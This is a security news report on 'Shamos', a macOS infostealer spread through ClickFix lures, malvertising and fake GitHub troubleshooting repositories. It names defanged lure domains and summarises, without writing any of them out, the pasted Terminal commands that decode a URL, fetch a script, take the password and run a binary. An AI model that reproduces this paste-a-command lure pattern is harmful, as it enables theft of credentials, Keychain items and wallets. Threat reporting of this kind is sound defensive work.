New macOS Infostealer ‘Shamos’ Spreads Through ClickFix Attacks
A new infostealer malware named Shamos is targeting macOS devices through ClickFix attacks that impersonate troubleshooting guides and fixes.
The malware, a variant of the Atomic macOS Stealer (AMOS), was developed by the cybercriminal group COOKIE SPIDER and is designed to steal sensitive information, including browser credentials, Keychain items, Apple Notes, and cryptocurrency wallets.
CrowdStrike, which discovered the malware, reports attempted infections against over 300 monitored environments worldwide since June 2025.
Malvertising and Fake GitHub Repositories
Shamos is delivered through malvertising campaigns and fake GitHub repositories posing as legitimate troubleshooting resources.
Malicious GitHub repository
Source: CrowdStrike
These lures direct victims to websites like mac-safer[.]com and rescue-mac[.]com, which provide fake instructions urging users to copy-paste shell commands into the Terminal to fix common macOS problems.
Malicious sponsored results on Google Search
Source: CrowdStrike
Instead of solving anything, the commands:
- Decode a Base64-encoded URL
- Fetch a malicious Bash script
- Steal the user’s password
- Download and execute the Shamos Mach-O binary
False instructions for fixing printer issues on macOS
Source: CrowdStrike